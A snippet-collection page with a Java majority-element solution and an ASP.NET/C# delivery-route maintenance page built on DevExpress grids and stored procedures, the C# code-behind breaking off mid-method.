Snippets Collections
class Solution {
    public List<Integer> majorityElement(int[] nums) {
        List<Integer> ar = new ArrayList<>();
        int cnt1 = 0;
        int cnt2 = 0;
        int ele1 = Integer.MIN_VALUE;
        int ele2 = Integer.MIN_VALUE;
        for (int i = 0; i < nums.length; i++) {
            if (cnt1 == 0 && nums[i] != ele2) {
                ele1 = nums[i];
                cnt1++;
            } else if (cnt2 == 0 && nums[i] != ele1) {
                ele2 = nums[i];
                cnt2++;
            } else if (ele1 == nums[i]) {
                cnt1++;
            } else if (ele2 == nums[i]) {
                cnt2++;
            } else {
                cnt1--;
                cnt2--;
            }
        }
        cnt1=0;
        cnt2=0;
        for(int x:nums){
            if(ele1==x)
                cnt1++;
            else if(ele2==x){
                     cnt2++;
            }
        }
        if(cnt1>(nums.length/3))
            ar.add(ele1);
        if(cnt2>(nums.length/3))
            ar.add(ele2);
        return ar;
    }
}
Secure Page
ASP.NET (.aspx) File
<%@ Page Language="C#" AutoEventWireup="true" Inherits="master_files_delivery_route" CodeFile="delivery_route.aspx.cs" %>

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>Delivery Route</title>
    <script type="text/javascript">
        function ProcessKeyDown(e) {
            if (e == 13) { gv_delivery_route.UpdateEdit(); }
            if (e == 27) { gv_delivery_route.CancelEdit(); }
        }

        var command = '';
        var cperror_msgnum;
        function Begin_CallBack(s, e) {
            command = e.command;
        }
        function End_CallBack(s, e) {
            if ((command == 'UPDATEEDIT' || command == 'DELETEROW') && s.cperror_add_info != 'error') {
                msg_popup.SetContentUrl("../common/error_message.aspx?message_num=" + s.cperror_msg_num + "&additional_info=" + s.cperror_add_info);
                msg_popup.Show();
            }
        }

        function End_CallBack_Grid(s, e) {
            if (s.cperror_msg_num != "-1") {
                msg_popup.SetContentUrl("../common/error_message.aspx?message_num=" + s.cperror_msg_num + "&additional_info=" + s.cperror_add_info);
                msg_popup.Show();
                s.cperror_msg_num = '-1';
            }
        }

        function DeliveryZone_Init(s, e) {
            s.GetMainElement().onclick = function () {
                var delivery_zone = s.GetText();
                s.PerformCallback();
                s.SetText(delivery_zone);
            };
        }

        function DeliveryZone_EndCallBack(s, e) {
            s.ShowDropDown();
        }

        function DeliveryZone_GotFocus(s, e) {
            var item_zone = s.GetSelectedItem();
            if (item_zone) {
                s.SetText(item_zone.GetColumnText('delivery_zone'));
            }
        }

        function DeliveryZone_SelectedChanged(s, e) {
            var item_zone = s.GetSelectedItem();
            if (item_zone) s.SetText(item_zone.GetColumnText('delivery_zone'));
            gv_delivery_route_d.GetEditor('description').SetValue(item_zone.GetColumnText('description'));
            gv_delivery_route_d.GetEditor('zone_group').SetValue(item_zone.GetColumnText('zone_group'));
            gv_delivery_route_d.GetEditor('zone_sub_group').SetValue(item_zone.GetColumnText('zone_sub_group'));
            gv_delivery_route_d.PerformCallback();
        }
    </script>
</head>
<body>
    <form id="form1" runat="server">
        <div style="display: inline-block; width: 100%; margin: -8;">
            <div style="padding-bottom: 3px;">
                <dx:ASPxButton runat="server" ID="btn_new_row" Text="Add New" Theme="Aqua" AutoPostBack="false" Width="88px" UseSubmitBehavior="false">
                    <ClientSideEvents Click="function(s, e) {
                                       gv_delivery_route.AddNewRow();   }" />
                </dx:ASPxButton>
            </div>
            <dx:ASPxGridView ID="gv_delivery_route" runat="server" AutoGenerateColumns="False" DataSourceID="sql_delivery_route" KeyFieldName="delivery_route" Theme="Aqua" OnInit="gv_delivery_route_Init"
                OnRowValidating="gv_delivery_route_RowValidating" EnableCallBacks="true" ClientInstanceName="gv_delivery_route" OnCellEditorInitialize="gv_delivery_route_CellEditorInitialize"
                Settings-ShowFilterBar="Auto" Settings-ShowFilterRow="true">
                <Columns>
                    <dx:GridViewCommandColumn VisibleIndex="0" ButtonType="Image" Width="60px">
                        <EditButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/img_edit.png"></Image>
                        </EditButton>
                        <UpdateButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/Apply.png"></Image>
                        </UpdateButton>
                        <CancelButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/Cancel.png"></Image>
                        </CancelButton>
                    </dx:GridViewCommandColumn>
                    <dx:GridViewDataTextColumn FieldName="delivery_route" ReadOnly="true" VisibleIndex="1" Caption="Delivery Route" PropertiesTextEdit-Style-BackColor="#C2E2ED">
                        <PropertiesTextEdit>
                            <ClientSideEvents KeyDown="function(s, e) {ProcessKeyDown(e.htmlEvent.keyCode); }" />
                        </PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="description" VisibleIndex="2" Caption="Description">
                        <PropertiesTextEdit>
                            <ClientSideEvents KeyDown="function(s, e) {ProcessKeyDown(e.htmlEvent.keyCode); }" />
                        </PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="created_by" ReadOnly="true" Visible="true" VisibleIndex="3" Caption="Create By">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataDateColumn FieldName="created_date" VisibleIndex="4" Caption="Create Date" ReadOnly="true" PropertiesDateEdit-DropDownButton-Enabled="false" PropertiesDateEdit-DisplayFormatInEditMode="true">
                        <PropertiesDateEdit></PropertiesDateEdit>
                    </dx:GridViewDataDateColumn>
                    <dx:GridViewDataTextColumn FieldName="updated_by" ReadOnly="true" VisibleIndex="5" Caption="Update By">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataDateColumn FieldName="updated_date" VisibleIndex="6" Caption="Updated Date" PropertiesDateEdit-DropDownButton-Enabled="false" ReadOnly="true" PropertiesDateEdit-DisplayFormatInEditMode="true">
                        <PropertiesDateEdit></PropertiesDateEdit>
                    </dx:GridViewDataDateColumn>
                    <dx:GridViewCommandColumn VisibleIndex="7" ButtonType="Image" Width="30px">
                        <DeleteButton Visible="true" Text="Delete" Image-Url="../images/img_delete.png">
                            <Image Url="../images/img_delete.png"></Image>
                        </DeleteButton>
                    </dx:GridViewCommandColumn>
                </Columns>
                <SettingsBehavior AllowSelectByRowClick="True" ConfirmDelete="True" AllowFocusedRow="true" />
                <SettingsEditing Mode="Inline" />
                <SettingsText ConfirmDelete="Are you sure you want to delete?" />
                <ClientSideEvents FocusedRowChanged="function(s, e) {               
                                                        if (typeof(gv_delivery_route_d) != 'undefined')
                                                        {                                                       
                                                            gv_delivery_route_d.PerformCallback(s.GetFocusedRowIndex());                                                                                                
                                                        }
                                                    }"
                    EndCallback="End_CallBack" BeginCallback="Begin_CallBack" />
                <Styles>
                    <CommandColumn Spacing="3px" Wrap="False" />
                </Styles>
            </dx:ASPxGridView>
            <div style="padding-top: 10px"></div>

            <div style="padding-bottom: 3px;">
                <dx:ASPxButton runat="server" ID="btn_add_delivery_route_d" Text="Add New" Theme="Aqua" AutoPostBack="false" Width="88px" UseSubmitBehavior="false">
                    <ClientSideEvents Click="function(s, e) {
                                       gv_delivery_route_d.AddNewRow();   }" />
                </dx:ASPxButton>
            </div>
            <dx:ASPxGridView ID="gv_delivery_route_d" runat="server" AutoGenerateColumns="False"
                OnCellEditorInitialize="gv_delivery_route_d_CellEditorInitialize"
                OnRowValidating="gv_delivery_route_d_RowValidating"
                OnInit="gv_delivery_route_d_Init"
                ClientInstanceName="gv_delivery_route_d"
                DataSourceID="sql_delivery_route_d"
                KeyFieldName="i_delivery_route;i_delivery_zone"
                OnCustomCallback="gv_delivery_route_d_CustomCallback"
                OnCommandButtonInitialize="gv_delivery_route_d_CommandButtonInitialize"
                Settings-ShowFilterBar="Auto"
                Settings-ShowFilterRow="true"
                Theme="Aqua" Width="100%">
                <Columns>
                    <dx:GridViewCommandColumn VisibleIndex="0" ButtonType="Image">
                        <EditButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/img_edit.png"></Image>
                        </EditButton>
                        <UpdateButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/Apply.png"></Image>
                        </UpdateButton>
                        <CancelButton Text="Edit" Visible="true" Image-Url="../images/img_edit.png">
                            <Image Url="../images/Cancel.png"></Image>
                        </CancelButton>
                    </dx:GridViewCommandColumn>
                    <dx:GridViewCommandColumn VisibleIndex="1" ButtonType="Image">
                        <CustomButtons>
                            <dx:GridViewCommandColumnCustomButton ID="cmdUp">
                                <Image Url="../images/Up.ico"></Image>
                            </dx:GridViewCommandColumnCustomButton>
                        </CustomButtons>
                        <CustomButtons>
                            <dx:GridViewCommandColumnCustomButton ID="cmdDown">
                                <Image Url="../images/Down.ico"></Image>
                            </dx:GridViewCommandColumnCustomButton>
                        </CustomButtons>                        
                    </dx:GridViewCommandColumn>
                    <dx:GridViewDataTextColumn FieldName="i_delivery_route" VisibleIndex="2" Width="150px" Visible="false">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataComboBoxColumn FieldName="i_delivery_zone" VisibleIndex="3" ReadOnly="true">
                        <PropertiesComboBox ValueField="delivery_zone" TextField="delivery_zone" TextFormatString="{0}"
                            DisplayFormatString="{0}" CallbackPageSize="30" EnableCallbackMode="true" DropDownStyle="DropDown"
                            OnItemsRequestedByFilterCondition="cbo_delivery_zone_ItemsRequestedByFilterCondition" IncrementalFilteringMode="Contains"
                            OnItemRequestedByValue="cbo_delivery_zone_ItemRequestedByValue">
                            <Columns>
                                <dx:ListBoxColumn Caption="Delivery Zone" FieldName="delivery_zone" Name="delivery_zone" />
                                <dx:ListBoxColumn Caption="Description" FieldName="description" Name="description" />
                                <dx:ListBoxColumn FieldName="zone_group" Name="zone_group" Caption="Zone Group" />
                                <dx:ListBoxColumn FieldName="zone_sub_group" Name="zone_sub_group" Caption="Zone Sub Group" />
                            </Columns>
                            <ClientSideEvents GotFocus="DeliveryZone_GotFocus"
                                Init="DeliveryZone_Init" ValueChanged="DeliveryZone_GotFocus" EndCallback="DeliveryZone_EndCallback" />
                        </PropertiesComboBox>
                    </dx:GridViewDataComboBoxColumn>
                    <dx:GridViewDataTextColumn FieldName="description" VisibleIndex="4" Width="150px" ReadOnly="true">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="zone_group" VisibleIndex="5" ReadOnly="true" Caption="Zone Group">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="zone_sub_group" VisibleIndex="6" ReadOnly="true" Caption="Zone Sub Group">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="load_seq" VisibleIndex="7" ReadOnly="true">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataTextColumn FieldName="created_by" ReadOnly="true" Visible="true" VisibleIndex="8" PropertiesTextEdit-Style-BackColor="LightGray">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataDateColumn FieldName="created_date" VisibleIndex="9" ReadOnly="true" PropertiesDateEdit-DropDownButton-Enabled="false" PropertiesDateEdit-DisplayFormatInEditMode="true">
                        <PropertiesDateEdit></PropertiesDateEdit>
                    </dx:GridViewDataDateColumn>
                    <dx:GridViewDataTextColumn FieldName="updated_by" ReadOnly="true" VisibleIndex="10" PropertiesTextEdit-Style-BackColor="LightGray">
                        <PropertiesTextEdit></PropertiesTextEdit>
                    </dx:GridViewDataTextColumn>
                    <dx:GridViewDataDateColumn FieldName="updated_date" VisibleIndex="11" PropertiesDateEdit-DropDownButton-Enabled="false" ReadOnly="true" PropertiesDateEdit-DisplayFormatInEditMode="true">
                        <PropertiesDateEdit></PropertiesDateEdit>
                    </dx:GridViewDataDateColumn>
                    <dx:GridViewCommandColumn VisibleIndex="12" ButtonType="Image">                        
                        <DeleteButton Visible="true" Text="Delete" Image-Url="../images/img_delete.png">
                            <Image Url="../images/img_delete.png"></Image>
                        </DeleteButton>
                    </dx:GridViewCommandColumn>
                </Columns>
                <ClientSideEvents EndCallback="End_CallBack_Grid" BeginCallback="Begin_CallBack" />
                <SettingsBehavior AllowSelectByRowClick="True" ConfirmDelete="True" />
                <SettingsEditing Mode="Inline" />
                <SettingsText ConfirmDelete="Are you sure you want to delete?" />
                <Styles>
                    <CommandColumn Spacing="3px" Wrap="False" />
                </Styles>
            </dx:ASPxGridView>

            <asp:SqlDataSource ID="sql_delivery_route_d" runat="server" ConnectionString="<%$ ConnectionStrings:mainConnection %>"
                SelectCommand="select_delivery_route_d" SelectCommandType="StoredProcedure"
                DeleteCommand="delete_delivery_route_d" DeleteCommandType="StoredProcedure"
                InsertCommand="save_delivery_route_d" InsertCommandType="StoredProcedure"
                UpdateCommand="save_delivery_route_d" UpdateCommandType="StoredProcedure"
                OnDeleted="sql_delivery_route_d_deleted" OnInserted="sql_delivery_route_d_inserted" OnUpdated="sql_delivery_route_d_updated"
                OnDeleting="sql_delivery_route_d_tran" OnUpdating="sql_delivery_route_d_tran" OnInserting="sql_delivery_route_d_tran" 
                OnSelecting="sql_delivery_route_d_Selecting">
                <SelectParameters>
                    <asp:Parameter Name="i_delivery_route" Type="String" />
                </SelectParameters>
                <DeleteParameters>
                    <asp:Parameter Name="i_delivery_route" Type="String" />
                    <asp:Parameter Name="i_delivery_zone" Type="String" />
                    <asp:Parameter Name="o_succeed" Type="Boolean" Direction="InputOutput" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </DeleteParameters>
                <InsertParameters>
                    <asp:Parameter Name="i_delivery_route" Type="String" />
                    <asp:Parameter Name="i_delivery_zone" Type="String" />
                    <asp:SessionParameter Name="i_user" SessionField="username" Type="String" />
                    <asp:Parameter Name="o_succeed" Type="Boolean" Direction="InputOutput" DefaultValue="false" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </InsertParameters>
                <UpdateParameters>
                    <asp:Parameter Name="i_delivery_route" Type="String" />
                    <asp:Parameter Name="i_delivery_zone" Type="String" />
                    <asp:SessionParameter Name="i_user" SessionField="username" Type="String" />
                    <asp:Parameter Name="o_succeed" Type="Boolean" Direction="InputOutput" DefaultValue="false" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </UpdateParameters>
            </asp:SqlDataSource>

            <asp:SqlDataSource ID="sql_delivery_route" runat="server"
                ConnectionString="<%$ ConnectionStrings:mainConnection %>"
                SelectCommand="select_delivery_route" SelectCommandType="StoredProcedure" DeleteCommand="delete_delivery_route"
                DeleteCommandType="StoredProcedure" InsertCommand="save_delivery_route" InsertCommandType="StoredProcedure"
                UpdateCommand="save_delivery_route" UpdateCommandType="StoredProcedure"
                OnDeleted="sql_delivery_route_popup" OnInserted="sql_delivery_route_popup" OnUpdated="sql_delivery_route_popup"
                OnUpdating="sql_delivery_route_tran" OnDeleting="sql_delivery_route_tran" OnInserting="sql_delivery_route_tran">

                <DeleteParameters>
                    <asp:Parameter Name="delivery_route" Type="String" />
                    <asp:Parameter Direction="InputOutput" Name="success" Type="Boolean" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </DeleteParameters>
                <InsertParameters>
                    <asp:Parameter Name="delivery_route" Type="String" />
                    <asp:Parameter Name="description" Type="String" />
                    <asp:SessionParameter Name="i_updated_by" SessionField="username" Type="String" />
                    <asp:SessionParameter Name="i_created_by" SessionField="username" Type="String" />
                    <asp:Parameter Name="success" Type="Boolean" Direction="InputOutput" DefaultValue="false" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </InsertParameters>
                <UpdateParameters>
                    <asp:Parameter Name="delivery_route" Type="String" />
                    <asp:Parameter Name="description" Type="String" />
                    <asp:SessionParameter Name="i_updated_by" SessionField="username" Type="String" />
                    <asp:SessionParameter Name="i_created_by" SessionField="username" Type="String" />
                    <asp:Parameter Name="success" Type="Boolean" Direction="InputOutput" DefaultValue="false" />
                    <asp:Parameter Name="o_msg_num" Type="Int32" Direction="InputOutput" Size="10" />
                    <asp:Parameter Name="o_add_info" Type="String" Direction="InputOutput" DefaultValue="" Size="3000" />
                </UpdateParameters>
            </asp:SqlDataSource>

            <asp:SqlDataSource ID="Sql_filter" runat="server" ConnectionString="<%$ ConnectionStrings:mainConnection%>"></asp:SqlDataSource>

            <dx:ASPxPopupControl ID="ASPxPopupControl2" runat="server"
                ClientInstanceName="msg_popup" ShowLoadingPanel="true" Theme="Aqua" ShowMaximizeButton="true" ContentUrl="javascript:void(0);"
                Width="400px" CloseAction="CloseButton" PopupHorizontalAlign="WindowCenter" PopupVerticalAlign="Above" MaxHeight="200px">
                <ContentCollection>
                    <dx:PopupControlContentControl ID="PopupControlContentControl1" runat="server">
                    </dx:PopupControlContentControl>
                </ContentCollection>

                <ClientSideEvents CloseUp="function(s,e){msg_popup.Hide();}" />
            </dx:ASPxPopupControl>
        </div>
    </form>
</body>
</html>
        
 Save
C# (.cs) File
using DevExpress.Web.ASPxGridView;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Data.Common;
using DevExpress.Web.ASPxEditors;

public partial class master_files_delivery_route : System.Web.UI.Page
{
    string asn_no, str_success, msg_num, g_messge, add_info;
    public SystemInfo sys;
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            Label_setting();
            FormatDate();
        }
        gv_delivery_route_d.JSProperties["cperror_msg_num"] = -1; //nilai default - tidak ada kesalahan /error
    }
    protected void gv_delivery_route_RowValidating(object sender, DevExpress.Web.Data.ASPxDataValidationEventArgs e)
    {
        if (e.NewValues["delivery_route"] == null)
        {
            AddError(e.Errors, gv_delivery_route.Columns["delivery_route"], "Delivery route is required.");
            gv_delivery_route.JSProperties["cperror_add_info"] = "error";
        }
        if (e.NewValues["description"] == null)
        {
            AddError(e.Errors, gv_delivery_route.Columns["description"], "Description is required.");
            gv_delivery_route.JSProperties["cperror_add_info"] = "error";
        }
    }
    private void FormatDate()
    {
        string dateformat = Session["date_format_desc"].ToString();

        //gv_delivery_route
        GridViewDataDateColumn col_created = gv_delivery_route.Columns["created_date"] as GridViewDataDateColumn;
        if (col_created != null)
        {
            col_created.PropertiesDateEdit.DisplayFormatString = dateformat;
        }
        GridViewDataDateColumn col_updated = gv_delivery_route.Columns["updated_date"] as GridViewDataDateColumn;
        if (col_updated != null)
        {
            col_updated.PropertiesDateEdit.DisplayFormatString = dateformat;
        }

        //gv_delivery_route_d
        GridViewDataDateColumn col_created1 = gv_delivery_route.Columns["created_date"] as GridViewDataDateColumn;
        if (col_created1 != null)
        {
            col_created1.PropertiesDateEdit.DisplayFormatString = dateformat;
        }
        GridViewDataDateColumn col_updated1 = gv_delivery_route.Columns["updated_date"] as GridViewDataDateColumn;
        if (col_updated1 != null)
        {
            col_updated1.PropertiesDateEdit.DisplayFormatString = dateformat;
        }
    }
    void AddError(Dictionary errors, GridViewColumn column, string errorText)
    {
        if (errors.ContainsKey(column)) return;
        errors[column] = errorText;
    }
    private void Label_setting()
    {
        DataSet ds = new DataSet();
        String sysMsg;
        DataTable dtLabelNum = new DataTable();
        dtLabelNum.Columns.Add("lblNum", typeof(int));
        DataTable dtLabelTabCol = new DataTable();
        //details
        dtLabelTabCol.Columns.Add("table_column", typeof(string));
        dtLabelTabCol.Rows.Add("delivery_route_d.delivery_route");
        dtLabelTabCol.Rows.Add("delivery_route_d.delivery_zone");
        dtLabelTabCol.Rows.Add("delivery_route_d.description");
        dtLabelTabCol.Rows.Add("delivery_route_d.load_seq");
        dtLabelTabCol.Rows.Add("delivery_route_d.updated_by");
        dtLabelTabCol.Rows.Add("delivery_route_d.updated_date");
        dtLabelTabCol.Rows.Add("delivery_route_d.created_by");
        dtLabelTabCol.Rows.Add("delivery_route_d.created_date");
        dtLabelTabCol.Rows.Add("delivery_zone.zone_group");
        dtLabelTabCol.Rows.Add("delivery_zone.zone_sub_group");

        //header       
        dtLabelTabCol.Rows.Add("delivery_route.updated_by");
        dtLabelTabCol.Rows.Add("delivery_route.updated_date");
        dtLabelTabCol.Rows.Add("delivery_route.created_by");
        dtLabelTabCol.Rows.Add("delivery_route.created_date");
        dtLabelTabCol.Rows.Add("delivery_route.description");
        dtLabelTabCol.Rows.Add("delivery_route.delivery_route");
        dtLabelNum.Rows.Add(6077);

        string owner_code = Session["default_owner_code"].ToString();
        string whs_code = Session["default_whs_code"].ToString();

        try
        {
            sys = new SystemInfo();
            ds = sys.Select_GetLabelByNum(dtLabelNum, dtLabelTabCol, owner_code, whs_code);
            gv_delivery_route_d.Columns["i_delivery_zone"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.delivery_zone", ds);
            gv_delivery_route_d.Columns["load_seq"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.load_seq", ds);
            gv_delivery_route_d.Columns["description"].Caption = SystemInfo.GetLabelByTabCol("delivery_route.description", ds);
            gv_delivery_route_d.Columns["zone_group"].Caption = SystemInfo.GetLabelByTabCol("delivery_zone.zone_group", ds);
            gv_delivery_route_d.Columns["zone_sub_group"].Caption = SystemInfo.GetLabelByTabCol("delivery_zone.zone_sub_group", ds);
            gv_delivery_route_d.Columns["updated_by"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.updated_by", ds);
            gv_delivery_route_d.Columns["updated_date"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.updated_date", ds);
            gv_delivery_route_d.Columns["created_by"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.created_by", ds);
            gv_delivery_route_d.Columns["created_date"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.created_date", ds);

            gv_delivery_route.Columns["delivery_route"].Caption = SystemInfo.GetLabelByTabCol("delivery_route.delivery_route", ds);
            gv_delivery_route.Columns["description"].Caption = SystemInfo.GetLabelByTabCol("delivery_route.description", ds);
            gv_delivery_route.Columns["created_by"].Caption = SystemInfo.GetLabelByTabCol("delivery_route.created_by", ds);
            gv_delivery_route.Columns["created_date"].Caption = SystemInfo.GetLabelByTabCol("delivery_route.created_date", ds);
            gv_delivery_route.Columns["updated_by"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.updated_by", ds);
            gv_delivery_route.Columns["updated_date"].Caption = SystemInfo.GetLabelByTabCol("delivery_route_d.updated_date", ds);

            //mandatory delivery route
            if (SystemInfo.GetMandatoryByTabCol("delivery_route.delivery_route", ds)) ((GridViewDataTextColumn)gv_delivery_route.Columns["delivery_route"]).PropertiesEdit.Style.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFEF97");
            if (SystemInfo.GetMandatoryByTabCol("delivery_route.description", ds)) ((GridViewDataTextColumn)gv_delivery_route.Columns["description"]).PropertiesEdit.Style.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFEF97");


            DataTable dt = new DataTable();
            dt = sys.Select_Getdate_Format(Session["date_format"].ToString());
            ((GridViewDataDateColumn)gv_delivery_route_d.Columns["created_date"]).PropertiesDateEdit.DisplayFormatString = dt.Rows[0]["description2"].ToString() + " " + dt.Rows[0]["time_format"].ToString();
            ((GridViewDataDateColumn)gv_delivery_route_d.Columns["updated_date"]).PropertiesDateEdit.DisplayFormatString = dt.Rows[0]["description2"].ToString() + " " + dt.Rows[0]["time_format"].ToString();

            //add new button
            btn_add_delivery_route_d.Text = btn_new_row.Text = SystemInfo.GetLabelByNum(6077, ds);

            int page_row_size = 0;

            page_row_size = sys.GetRowPerPage(Session["default_owner_code"].ToString(), Session["default_whs_code"].ToString());
            gv_delivery_route.SettingsPager.PageSize = page_row_size;
            gv_delivery_route_d.SettingsPager.PageSize = page_row_size;

        }
        catch (Exception ex)
        {
            sysMsg = ex.ToString();
            Response.Write(sysMsg);
        }
    }
    protected void sql_delivery_route_popup(object sender, SqlDataSourceStatusEventArgs e)
    {
        Boolean success;
        Int32 msgNum;
        string addinfo;
        
        // Pastikan koneksi database terbuka
        if (e.Command.Connection.State.Equals("Closed")) e.Command.Connection.Open();
        if (e.Command.Transaction == null) e.Command.Transaction = e.Command.Connection.BeginTransaction();
        try
        {
            success = Convert.ToBoolean(e.Command.Parameters["@success"].Value);
            msgNum = Convert.ToInt32(e.Command.Parameters["@o_msg_num"].Value);
            addinfo = Convert.ToString(e.Command.Parameters["@o_add_info"].Value);
            if (success)
            {
              //coomit jika sukses
                e.Command.Transaction.Commit();


            // Mengirimkan informasi sukses ke client-side menggunakan JSProperties
                gv_delivery_route.JSProperties["cperror_msg_num"] = msgNum;
                gv_delivery_route.JSProperties["cperror_add_info"] = addinfo;

            }
            else
            {
              // Jika operasi gagal, rollback transaksi
                if (e.Command.Transaction != null)
                {
                    e.Command.Transaction.Rollback();
                }
                    // Mengirimkan informasi kesalahan ke client-side menggunakan JSProperties
                gv_delivery_route.JSProperties["cperror_msg_num"] = msgNum;
                gv_delivery_route.JSProperties["cperror_add_info"] = addinfo;

            }
        }
        catch (Exception ex)
        {
            //// Jika terjadi error, batalkan transaksi dan lemparkan exception
            if (e.Command.Transaction != null)
                e.Command.Transaction.Dispose();
            throw (ex);
        }
        finally
        {
            // Pastikan transaksi dibersihkan setelah selesai
            if (e.Command.Transaction != null)
                e.Command.Transaction.Dispose();
        }

    }
 
   
    protected void gv_delivery_route_CellEditorInitialize(object sender, ASPxGridViewEditorEventArgs e)
    {
      // Mengecek apakah sedang mengedit baris baru
        if (gv_delivery_route.IsNewRowEditing)
        {
  
           // Mengecek apakah kolom yang diedit adalah kolom "delivery_route"
            if (e.Column.FieldName == "delivery_route")
              // Membuat editor kolom "delivery_route" menjadi bisa diedit
                e.Editor.ReadOnly = false;
            else
                return; // Jika kolom yang diedit bukan "delivery_route", tidak ada tindakan lebih lanjut
        }
        else
            return;
    }
    protected void gv_delivery_route_Init(object sender, EventArgs e)
    {
      //Mendapatkan pesan konfirmasi penghapusan berdasarkan ID pesan (262) dan bahasa yang dipilih oleh pengguna
        string label = SystemInfo.errorMsg(262, (string)Session["language"]);
        ASPxGridView grid_ln = (ASPxGridView)sender;
        grid_ln.SettingsText.ConfirmDelete = label;
    }
    protected void sql_delivery_route_tran(object sender, SqlDataSourceCommandEventArgs e)
    {
      //open koneksi
        e.Command.Connection.Open();
        // Memulai transaksi pada koneksi yang terbuka
        e.Command.Transaction = e.Command.Connection.BeginTransaction();
    }
    protected void gv_delivery_route_d_CustomCallback(object sender, ASPxGridViewCustomCallbackEventArgs e)
    {
        gv_delivery_route_d.DataBind();
    }

    // Event handler untuk validasi baris baru
    protected void gv_delivery_route_d_RowValidating(object sender, DevExpress.Web.Data.ASPxDataValidationEventArgs e)
    {
        if (e.NewValues["i_delivery_zone"] == null)
        {
            AddError(e.Errors, gv_delivery_route.Columns["i_delivery_zone"], "Delivery Zone is required.");
            gv_delivery_route.JSProperties["cperror_add_info"] = "error";
        }
    }
    protected void gv_delivery_route_d_Init(object sender, EventArgs e)
    {
        string label = SystemInfo.errorMsg(262, (string)Session["language"]);
        ASPxGridView grid_ln = (ASPxGridView)sender;
        grid_ln.SettingsText.ConfirmDelete = label;
    }
    protected void gv_delivery_route_d_CellEditorInitialize(object sender, ASPxGridViewEditorEventArgs e)
    {
        if (gv_delivery_route_d.IsNewRowEditing)
        {
            if (e.Column.FieldName == "i_delivery_zone")
                e.Editor.ReadOnly = false;
            else
                return;
        }
        else
            return;

        if (e.Column.FieldName == "i_delivery_zone")
        {
            ASPxComboBox combo = e.Editor as ASPxComboBox;
            combo.ClientSideEvents.SelectedIndexChanged = "DeliveryZone_SelectedChanged";
        }
    }
    protected void sql_delivery_route_d_deleted(object sender, SqlDataSourceStatusEventArgs e)
    {
        DbCommand command = e.Command;
        DbTransaction tx = command.Transaction;

        try
        {
            str_success = e.Command.Parameters["@o_succeed"].Value.ToString();
            msg_num = e.Command.Parameters["@o_msg_num"].Value.ToString();
            add_info = e.Command.Parameters["@o_add_info"].Value.ToString();
            if ((bool)e.Command.Parameters["@o_succeed"].Value)
            {
                tx.Commit();
                Show_Error_Detail("173", "~/images/ok-icon.png", "");
            }
            else
            {
                tx.Rollback();
                Show_Error_Detail(msg_num, "~/images/error_button.png", "Add Info [ " + add_info + " ]");
            }

        }
        catch (Exception ex)
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
            throw (ex);
        }
        finally
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
        }
    }
    protected void sql_delivery_route_d_inserted(object sender, SqlDataSourceStatusEventArgs e)
    {
        DbCommand command = e.Command;
        DbTransaction tx = command.Transaction;

        try
        {
            str_success = e.Command.Parameters["@o_succeed"].Value.ToString();
            msg_num = e.Command.Parameters["@o_msg_num"].Value.ToString();
            add_info = e.Command.Parameters["@o_add_info"].Value.ToString();
